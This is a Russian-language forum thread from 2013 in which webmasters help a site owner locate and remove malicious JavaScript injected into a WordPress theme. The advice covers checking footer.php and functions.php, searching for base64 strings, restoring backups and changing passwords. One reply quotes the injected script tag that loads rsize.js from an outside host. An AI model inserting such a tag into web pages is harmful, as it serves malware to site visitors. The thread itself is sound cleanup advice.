SEO Сообщество: Спрашивайте и помогайте

Присоединяйтесь к сообществу профессиональных веб-мастеров PR-CY, отвечайте на вопросы коллег и задавайте свои.

Q&A SEO

Помогите найти вредоносный код wp

5gorsk 5gorsk  
10
  20.03.2013 11:37       1 325    
Приветствую всех. На сайт закрался вредоносный код, за что яндекс пометил сайт как опасный. Антивирус касперского ругается на некий JS с адресом сайта тем для wp. Я облазил весь код и не смог найти откуда выводится этот ява скрипт. Может ктонибудь уже сталкивался с подобным, дайте совет как решить проблему.

Ответы на пост (16) Написать ответ
Denis979 Denis979
11
20.03.2013 13:20
В файле индекс в корне сайта. Если посмотреть на код, то там должно появится лишний строчки, типа скрипта. Лечится тем или с бэкапа берется такой сайт или удаляются эти строчки. Чтобы такое не повторялось надо поставить права на этой файл 444. У меня такое было и постоянно что-то дописывалось в этот файл, пока права на доступ к этому сайту не поменял. Удачи!
0
Решение
Asxl Asxl
5
20.03.2013 11:47
Смотри лишний код в .htaccess ) Если не поможет, отпишись, скажу где еще смотреть. Если поможет, то тоже отпишись )
0
5gorsk 5gorsk
10
20.03.2013 12:03
собственно забыл указать сайт , urtano.ru вот на нем проблема, щас гляну htaccess, спасибо
0
5gorsk 5gorsk
10
20.03.2013 12:07
в .htaccess все норм, посмотрел
0
NskRonin NskRonin
4
20.03.2013 12:03
Вообще это долджен быть код в base64 где нибудь в футере страницы. А вообще яндекс показывает где именно его нужно смотреть - от этого и нужно оттолкнуться.
Еще как вариант - какие моды ставились в последние дни?
А по сути такой момент решается бэкапом файлов.
0
5gorsk 5gorsk
10
20.03.2013 12:12
кроме плагинов All in One SEO Pack, Google XML Sitemaps, WP-PageNavi, iSape, Wp-Thumbie ничего не ставил, но я исключаю возможность что вирус в плагинах, т.к. папку с плагинами выкачивал с другого сайта, а с тем сайтом все нормально. В яндекс панели вебмастера так и не нашел внятного ответа где находится вирус, тупо написано urtano.ru и все
0
Asxl Asxl
5
20.03.2013 12:18
У тебя на главной странице встроилось "
</html><script src="http://feelthesame.changeip.name/rsize.js"></script>
Значит, скорее всего в footer.php в админке посмотри и удали.
0
Asxl Asxl
5
20.03.2013 12:19
Да, это на всех страницах. Значит в футере...
0
Asxl Asxl
5
20.03.2013 12:21
Как решишь проблему, желательно выкачай все файлы с фтп, и Тотал коммандером пройдись на наличие кода лишнего поиском. Код должен быть зашифрованным как писали выше. Но начало у него Всегда что-то вроде "Var" и дальше не помню. После этого перезалей все файлы, смени пароли на фтп, админку и mysql желательно.
0
wadya wadya
84
20.03.2013 13:42
надо через Notepad++ выбрать поиск-найти в файлах:
фразы "encode", "base64", "rsize"
Если найдешь, то смотри по коду что будет с ним и без него)
0
5gorsk 5gorsk
10
20.03.2013 15:26
как код прописывается я так и не нашел, проблему решил перезалитием бекапа, как советовали выше установил права на индекс.пхп 444 .Сменил все пароли к сайту. Понаблюдаю пока за сайтом, если проблема вновь возникнет - придется искать этот самый код. Всем большое спасибо за помощь!!!
0
Kimin Kimin
872
20.03.2013 16:46
Бесплатная тема WP последних трех лет - всегда проблема. Меня запарили многочисленные зомби-js, и я к чертовой матери снес все старые темы и написал свои собственные. Теперь уверен и в самих темах, и в том, что они летают, как истребители - нет лишних и ненужных элементов.
А тебе тут главного не написали - код может скрываться в functions.php, причем обфусцированный. В десятки тысяч знаков...
0
5gorsk 5gorsk
10
20.03.2013 22:49
полюбому в теме спрятан этот код, если еще раз такая проблема возникнет то поставлю свою тему, уже проверенную. Посмотрел сейчас functions.php, нет ничего даже похожего на этот код, хотя как вы говорите он может быть и зашифрованным..
0
roger3 roger3
30
21.03.2013 17:20

Как писали выше, данный код скорее всего зашифрован в functions, очень часто при попытке его удаления, тема перестает работать.

0
roger3 roger3
30
21.03.2013 17:22
Мой вам совет-смените тему и запросите повторную проверку сайта, когда получите ответ, делайте выводы
0